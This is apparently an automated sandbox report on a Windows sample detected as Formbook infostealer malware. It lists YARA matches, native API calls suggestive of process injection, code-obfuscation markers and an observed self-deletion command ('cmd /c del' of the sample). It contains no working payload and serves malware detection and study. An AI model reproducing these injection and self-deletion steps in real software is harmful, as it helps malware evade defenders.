Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A
Detected potential crypto function
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00406354 0_2_00406354
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00404802 0_2_00404802
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00406B2B 0_2_00406B2B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_72915CF1 0_2_72915CF1
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_72915CE2 0_2_72915CE2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041C8F4 1_2_0041C8F4
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B8B3 1_2_0041B8B3
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041C266 1_2_0041C266
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004012FB 1_2_004012FB
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00408C6B 1_2_00408C6B
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00408C70 1_2_00408C70
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041C431 1_2_0041C431
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 1_2_00BB20A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B090 1_2_00B9B090
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C528EC 1_2_00C528EC
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C520A8 1_2_00C520A8
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41002 1_2_00C41002
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5E824 1_2_00C5E824
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 1_2_00BA4120
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8F900 1_2_00B8F900
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C522AE 1_2_00C522AE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBEBB0 1_2_00BBEBB0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4DBD2 1_2_00C4DBD2
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C52B28 1_2_00C52B28
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4D466 1_2_00C4D466
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9841F 1_2_00B9841F
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C525DD 1_2_00C525DD
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2581 1_2_00BB2581
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9D5E0 1_2_00B9D5E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C51D55 1_2_00C51D55
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B80D20 1_2_00B80D20
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C52D07 1_2_00C52D07
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387EBB0 7_2_0387EBB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03866E30 7_2_03866E30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03872581 7_2_03872581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385D5E0 7_2_0385D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0384F900 7_2_0384F900
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03840D20 7_2_03840D20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03864120 7_2_03864120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03911D55 7_2_03911D55
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B090 7_2_0385B090
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901002 7_2_03901002
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385841F 7_2_0385841F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057C8F4 7_2_0057C8F4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057B8B3 7_2_0057B8B3
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057C266 7_2_0057C266
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00568C70 7_2_00568C70
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00568C6B 7_2_00568C6B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0057C431 7_2_0057C431
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00562D90 7_2_00562D90
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00562FB0 7_2_00562FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0384B150 appears 32 times
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: String function: 00B8B150 appears 34 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004185D0 NtCreateFile, 1_2_004185D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418680 NtReadFile, 1_2_00418680
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418700 NtClose, 1_2_00418700
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004187B0 NtAllocateVirtualMemory, 1_2_004187B0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004185CA NtCreateFile, 1_2_004185CA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418622 NtCreateFile, 1_2_00418622
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004186FA NtClose, 1_2_004186FA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004187AA NtAllocateVirtualMemory, 1_2_004187AA
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00BC98F0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00BC9860
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9840 NtDelayExecution,LdrInitializeThunk, 1_2_00BC9840
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC99A0 NtCreateSection,LdrInitializeThunk, 1_2_00BC99A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00BC9910
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A20 NtResumeThread,LdrInitializeThunk, 1_2_00BC9A20
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00BC9A00
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A50 NtCreateFile,LdrInitializeThunk, 1_2_00BC9A50
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC95D0 NtClose,LdrInitializeThunk, 1_2_00BC95D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9540 NtReadFile,LdrInitializeThunk, 1_2_00BC9540
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00BC96E0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00BC9660
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00BC97A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00BC9780
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00BC9FE0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00BC9710
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC98A0 NtWriteVirtualMemory, 1_2_00BC98A0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9820 NtEnumerateKey, 1_2_00BC9820
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BCB040 NtSuspendThread, 1_2_00BCB040
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC99D0 NtCreateProcessEx, 1_2_00BC99D0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9950 NtQueueApcThread, 1_2_00BC9950
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A80 NtOpenDirectoryObject, 1_2_00BC9A80
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9A10 NtQuerySection, 1_2_00BC9A10
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BCA3B0 NtGetContextThread, 1_2_00BCA3B0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9B00 NtSetValueKey, 1_2_00BC9B00
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC95F0 NtQueryInformationFile, 1_2_00BC95F0
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BCAD30 NtSetContextThread, 1_2_00BCAD30
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9520 NtWaitForSingleObject, 1_2_00BC9520
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC9560 NtWriteFile, 1_2_00BC9560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889780 NtMapViewOfSection,LdrInitializeThunk, 7_2_03889780
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889FE0 NtCreateMutant,LdrInitializeThunk, 7_2_03889FE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889710 NtQueryInformationToken,LdrInitializeThunk, 7_2_03889710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038896D0 NtCreateKey,LdrInitializeThunk, 7_2_038896D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_038896E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889650 NtQueryValueKey,LdrInitializeThunk, 7_2_03889650
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A50 NtCreateFile,LdrInitializeThunk, 7_2_03889A50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_03889660
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038899A0 NtCreateSection,LdrInitializeThunk, 7_2_038899A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038895D0 NtClose,LdrInitializeThunk, 7_2_038895D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_03889910
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889540 NtReadFile,LdrInitializeThunk, 7_2_03889540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889840 NtDelayExecution,LdrInitializeThunk, 7_2_03889840
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_03889860
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038897A0 NtUnmapViewOfSection, 7_2_038897A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388A3B0 NtGetContextThread, 7_2_0388A3B0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889B00 NtSetValueKey, 7_2_03889B00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388A710 NtOpenProcessToken, 7_2_0388A710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889730 NtQueryVirtualMemory, 7_2_03889730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889760 NtOpenProcess, 7_2_03889760
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889770 NtSetInformationFile, 7_2_03889770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388A770 NtOpenThread, 7_2_0388A770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A80 NtOpenDirectoryObject, 7_2_03889A80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A00 NtProtectVirtualMemory, 7_2_03889A00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889610 NtEnumerateValueKey, 7_2_03889610
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A10 NtQuerySection, 7_2_03889A10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889A20 NtResumeThread, 7_2_03889A20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889670 NtQueryInformationProcess, 7_2_03889670
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038899D0 NtCreateProcessEx, 7_2_038899D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038895F0 NtQueryInformationFile, 7_2_038895F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889520 NtWaitForSingleObject, 7_2_03889520
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388AD30 NtSetContextThread, 7_2_0388AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889950 NtQueueApcThread, 7_2_03889950
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889560 NtWriteFile, 7_2_03889560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038898A0 NtWriteVirtualMemory, 7_2_038898A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038898F0 NtReadVirtualMemory, 7_2_038898F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03889820 NtEnumerateKey, 7_2_03889820
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0388B040 NtSuspendThread, 7_2_0388B040
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005785D0 NtCreateFile, 7_2_005785D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578680 NtReadFile, 7_2_00578680
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578700 NtClose, 7_2_00578700
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005787B0 NtAllocateVirtualMemory, 7_2_005787B0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005785CA NtCreateFile, 7_2_005785CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_00578622 NtCreateFile, 7_2_00578622
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005786FA NtClose, 7_2_005786FA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_005787AA NtAllocateVirtualMemory, 7_2_005787AA
Sample file is different than original file name gathered from version info
Source: DN_467842234567.exe, 00000000.00000003.671874971.000000000EA76000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
Source: DN_467842234567.exe, 00000001.00000002.734746634.0000000000B16000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs DN_467842234567.exe
Source: DN_467842234567.exe, 00000001.00000002.735470838.0000000000C7F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DN_467842234567.exe
Source: DN_467842234567.exe ReversingLabs: Detection: 64%
Source: C:\Users\user\Desktop\DN_467842234567.exe File read: C:\Users\user\Desktop\DN_467842234567.exe Jump to behavior
Source: DN_467842234567.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DN_467842234567.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Users\user\Desktop\DN_467842234567.exe Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DN_467842234567.exe Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe File created: C:\Users\user\AppData\Local\Temp\nslF1B.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@13/6
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar, 0_2_00402053
Source: C:\Users\user\Desktop\DN_467842234567.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004042C1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\DN_467842234567.exe Unpacked PE file: 1.2.DN_467842234567.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0040C845 push es; ret 1_2_0040C846
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B87C push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B812 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B81B push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004172E9 push edx; retf 1_2_004172EE
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00418AE8 push ds; retf 1_2_00418AED
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BDD0D1 push ecx; ret 1_2_00BDD0E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0389D0D1 push ecx; ret 7_2_0389D0E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0056C845 push es; ret 7_2_0056C846
